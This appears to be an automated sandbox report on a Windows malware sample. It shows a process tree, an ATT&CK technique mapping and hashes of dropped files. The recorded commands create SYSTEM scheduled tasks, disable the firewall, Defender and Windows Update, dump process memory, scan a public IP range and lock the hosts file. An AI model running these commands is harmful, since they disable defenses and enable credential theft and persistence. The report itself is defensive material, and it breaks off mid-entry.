- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "ytkutiuha" /ru system /tr "cmd /c C:\Windows\ime\gaettyt.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "augdqptyd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qpkiztfb\gaettyt.exe /p everyone:F"
  2⤵
  PID:3528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:680
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "augdqptyd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qpkiztfb\gaettyt.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "magaujzua" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bgegeutip\ceuhqk.exe /p everyone:F"
  2⤵
  PID:3896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1852
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "magaujzua" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bgegeutip\ceuhqk.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2888
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2112
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4304
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2204
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4892
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1340
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4492
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3076
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3436
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3724
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4340
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2868
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:712
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4940
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4564
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:5068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1116
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:3992
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2880
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 776 C:\Windows\TEMP\utbcclcbi\776.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3260
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:3112
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:4084
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2764
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1232
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:4964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2784
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:3284
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:2652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5028
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4644
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:316
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2700
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:1584
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:452
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 336 C:\Windows\TEMP\utbcclcbi\336.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1236
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 1436 C:\Windows\TEMP\utbcclcbi\1436.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2604
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 2664 C:\Windows\TEMP\utbcclcbi\2664.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:620
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 2804 C:\Windows\TEMP\utbcclcbi\2804.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3404
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3056 C:\Windows\TEMP\utbcclcbi\3056.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4800
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 1100 C:\Windows\TEMP\utbcclcbi\1100.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3176
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3772 C:\Windows\TEMP\utbcclcbi\3772.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2940
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3872 C:\Windows\TEMP\utbcclcbi\3872.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:880
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3932 C:\Windows\TEMP\utbcclcbi\3932.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5000
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 4024 C:\Windows\TEMP\utbcclcbi\4024.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4892
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 2172 C:\Windows\TEMP\utbcclcbi\2172.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3004
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3560 C:\Windows\TEMP\utbcclcbi\3560.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 4108 C:\Windows\TEMP\utbcclcbi\4108.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2384
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 624 C:\Windows\TEMP\utbcclcbi\624.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:736
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 4784 C:\Windows\TEMP\utbcclcbi\4784.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1940
- C:\Windows\TEMP\utbcclcbi\spitymcii.exe
  C:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3192 C:\Windows\TEMP\utbcclcbi\3192.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3180
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\utbcclcbi\kgwtlrdzw\scan.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2152
- - C:\Windows\utbcclcbi\kgwtlrdzw\lutllwily.exe
    lutllwily.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:1732
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2272
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:916
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5000
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:4924

C:\Windows\SysWOW64\ditzew.exe
C:\Windows\SysWOW64\ditzew.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2132

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qpkiztfb\gaettyt.exe /p everyone:F
1⤵
PID:652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1816
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\qpkiztfb\gaettyt.exe /p everyone:F
  2⤵
  PID:2200

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\gaettyt.exe
1⤵
PID:2224
- C:\Windows\ime\gaettyt.exe
  C:\Windows\ime\gaettyt.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4208

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bgegeutip\ceuhqk.exe /p everyone:F
1⤵
PID:920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1852
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\bgegeutip\ceuhqk.exe /p everyone:F
  2⤵
  PID:316

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\gaettyt.exe
1⤵
PID:4304
- C:\Windows\ime\gaettyt.exe
  C:\Windows\ime\gaettyt.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1928

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qpkiztfb\gaettyt.exe /p everyone:F
1⤵
PID:5072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1992
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\qpkiztfb\gaettyt.exe /p everyone:F
  2⤵
  PID:2724

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bgegeutip\ceuhqk.exe /p everyone:F
1⤵
PID:2924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:448
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\bgegeutip\ceuhqk.exe /p everyone:F
  2⤵
  PID:4732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\bgegeutip\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\utbcclcbi\1100.dmp

Filesize
818KB

MD5
bbce18d98cc7cbbb39938942cfcadae2

SHA1
837347c87c10402bcb132f069cf8aa3bd98134d7

SHA256
a50012ee51d75c84e28a28e77ac9c2ffaef486bf4221feebd916291154405e46

SHA512
717f6df71a8faed58174cdacbd2c7773d352ad24967e46fda165a9e8ba9b63e08895d81a7679413dd57cb9490ce1f86504cb12023930ce1b70ccfe7d266f9b15

Download Submit
C:\Windows\TEMP\utbcclcbi\1436.dmp

Filesize
4.1MB

MD5
4df1b5cc59277b50cc3826912baf6445

SHA1
cbaaaf879737a088751650b6ef6c4e9c1964613d

SHA256
71d9ec865d6483798f7e58c96aef28e3150d585a7f8b538c162196583747acd7

SHA512
5e5c11627fec7a2277674d273d488842d88b34ef477baeec2d84a417c3683f184e5d9b8ba63d44ac4c9af7de94bb6fccd4302abbf3443e20546e7508e57e87a0

Download Submit
C:\Windows\TEMP\utbcclcbi\2172.dmp

Filesize
1.2MB

MD5
5b48af3afe896199587a6d38b780045d

SHA1
8d1f341cc489bcfe41c0e577e74bcf8ea7d5ce58

SHA256
4f0e5a32ce89683bf2f589e0a417b3ef50bcb908a6f4f9a8cd0d8579900d2764

SHA512
988d583654c59c872ed23aa193ef52ecd3b50d9212f3fdb6d0bf0c69ba0413597c7a5007d3bc18dd69783bdf185c3015983e3c30325e265eb96d2b87a9e6b5d0

Download Submit
C:\Windows\TEMP\utbcclcbi\2664.dmp

Filesize
3.8MB

MD5
3cbfa066ac8c5319a96e3d5d40d660e3

SHA1
ce7ab97a63ccf9bbabd985a9a72319480348ae41

SHA256
9f94588d70f8b596b04e823d2dfbc8f59b87280f7cd9339b34378dc5f82d6ef5

SHA512
6169fff84378165b6a7ec6a13b3118d52d3c4f5ce2fba5bd78908f8fa473b1c781e5ef8fca796ab913baee80b8d2111fc70907bd9be7ed0207fba03a28bcbda8

Download Submit
C:\Windows\TEMP\utbcclcbi\2804.dmp

Filesize
7.5MB

MD5
64fd27ba2fda40ed988ddcbbe4a118de

SHA1
48a5354d6d51dce858396477c57fc5c9e6bd24cb

SHA256
8f5e18512923e2a9165bca2dab8a00c44a3fab25660e5d4991eea66fc8d8f169

SHA512
14b4930a3b0307bff4d6b93c0671057a231c400a5106f5e0eb769e674cf5c163aad1f82cc9b23aa63f249e2ddd66b3bf61b0f727fd516f5c32db3f9dc0add56b

Download Submit
C:\Windows\TEMP\utbcclcbi\3056.dmp

Filesize
2.9MB

MD5
69bac38c4b3045341d54e5066827c3dd

SHA1
5794c6ba165103fd37aa5038de7eae1eefa12f8b

SHA256
474f75a6ed11b02cb3c57dfbb0cb7f5782b586227aedbabd1fa57918b43a9c74

SHA512
a815174d89f1f5ea64944cb11c81dd532dc423cb321aeaaea76212d74198b8cfaf1c3956b348c99522a65c8904716029db790526afd6a492941f990aa3f02f9e

Download Submit
C:\Windows\TEMP\utbcclcbi\336.dmp

Filesize
33.5MB

MD5
f15812e9b67916d15389dd01813c8bc4

SHA1
d756f56795ec206ac5755201ffc33d222ca771cc

SHA256
71dc1d2294b532387821aa0dd027366e3569b42d68cdedea9d2247f292ec419c

SHA512
6c6b5f7f6e327f14669ec377d32739bf707e9167c1e0c2a7218041b49594f80147612fe60f43a72fa4bb548dee2880f93d642e852070e4b9a1ea5c1dd3aacbdd

Download Submit
C:\Windows\TEMP\utbcclcbi\3560.dmp

Filesize
25.7MB

MD5
579f2c385d8ea322a03c00672035785e

SHA1
e90f7aac6902014221db4089188a9d4f4079453d

SHA256
d3bd9f9123ad2c35fa8e943d391370eeea3d08607ba6c2122ecc41be80673220

SHA512
7d182ff10045c48a5ff5dd6acb6fde24700d77c628ce9280c079baae88972f751bb36c6262d654b2d7afdb7e926c74ec9f6397e92c0b9cf7f85770d0ce90ebcd

Download Submit
C:\Windows\TEMP\utbcclcbi\3772.dmp

Filesize
2.5MB

MD5
4973235df65558ff5d11a0c7509b49f8

SHA1
3467d2045c8c90ce3faa5a1530fcd6dfc255a3d9

SHA256
ced06f6ff328d8ee59fe50e91695ebdf44be9d772e40705c5091c62aed89e96e

SHA512
936f4ef27e66cbeda9de5bc5e2133f8b9917d396895c4ee74827fb2532cf87a7cfc921b1df242d6e399bea67884211dbf628932bd49a8ea88cc3c58cd09383f8

Download Submit
C:\Windows\TEMP\utbcclcbi\3872.dmp

Filesize
20.5MB

MD5
4af06f078e62e97160dc8080ebe09555

SHA1
7373a643d7534cc606d64ac590b5d583d92140e0

SHA256
7e444600d44307fa3b19bfd98a9237d30a833d1e462ec73ba971a5707dbe73d1

SHA512
3ca5766984857b61f2858a74786e3c12f9e07a7f03468d3b46f4b270f1ef955715e6333dfac7900ed3b46720f2701f5384549e5525295e38982a266eecb1f136

Download Submit
C:\Windows\TEMP\utbcclcbi\3932.dmp

Filesize
4.4MB

MD5
c043b58ce133ebd46eb5aed7abc11bb9

SHA1
62d8f8045c33cfb9f442c8d514a6b416bc405610

SHA256
f5b388c291230e5aa4cd271844e995a8bb630c5b285dd48286c1fc17283a8f6e

SHA512
5e6bacfa27025d1a537253574965390f237f928a6e090e91a15fbea5811f4629018cd641b68d896548c595905faeea58228727a0455c127d1b2acf713fc9010a

Download Submit
C:\Windows\TEMP\utbcclcbi\4024.dmp

Filesize
44.0MB

MD5
e63e081a122dcd782a55796b40d87e83

SHA1
06a05b18df8776434d33325415509cb5231a8dab

SHA256
682770ac5452a2468fca8a7e43a6f6ab207ac41e5b4a8e565b0eb975f7d85cd5

SHA512
02bb360353208773d3ddd18b49f032784835e479a44c0bd1bb53a5e5044ccef7dd3b0f5cc859f8a9992649c6b14e79303f622a961001172518aa15d530ca3c28

Download Submit
C:\Windows\TEMP\utbcclcbi\4108.dmp

Filesize
8.7MB

MD5
65ca5677e5702db5564b6ee071e917b4

SHA1
ce9581b67b170c98edb9884f487a995e95e567b0

SHA256
f3fac9e7ba9a9537c2ea1f100d47adce5f06040bb7649904e1895f78a7138e07

SHA512
9704e60d1744adaf2e04008cb5e1b8f09776a001cb14797f809c9050ce3092d5839e4fa00267793561088cb98641e8a3407922eba1b681fbc5958e08c857e230

Download Submit
C:\Windows\TEMP\utbcclcbi\776.dmp

Filesize
1019KB

MD5
7fa129c43a67b671abb86baf299d601a

SHA1
0e6774aacac2caff913b34a84d8ca0f4a9a2b10b

SHA256
af8cfdb6c93b23fb2060b6f825cc23136a58d212a75c607fecf2c525092cd5d5

SHA512
a5e682e8343c9f586d0d3b05b9b2861c67a650aa54611720e5660be458166969df658ac2eca9dfbd6ca5f03a06e7aec2edff5919d82edc9b256187f59b72b9e2

Download Submit
C:\Windows\Temp\bgegeutip\ceuhqk.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\nspF743.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nspF743.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\utbcclcbi\spitymcii.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\qpkiztfb\gaettyt.exe

Filesize
13.4MB

MD5
c4035b4a25cb8414b202a29b6af15d91

SHA1
06dc4bbad95fc546ac67b782d03b6169bef1ae36

SHA256
4d0adab8843e344c89ada507d608fa19ee86c9037f171450a72d10fe7bec18db

SHA512
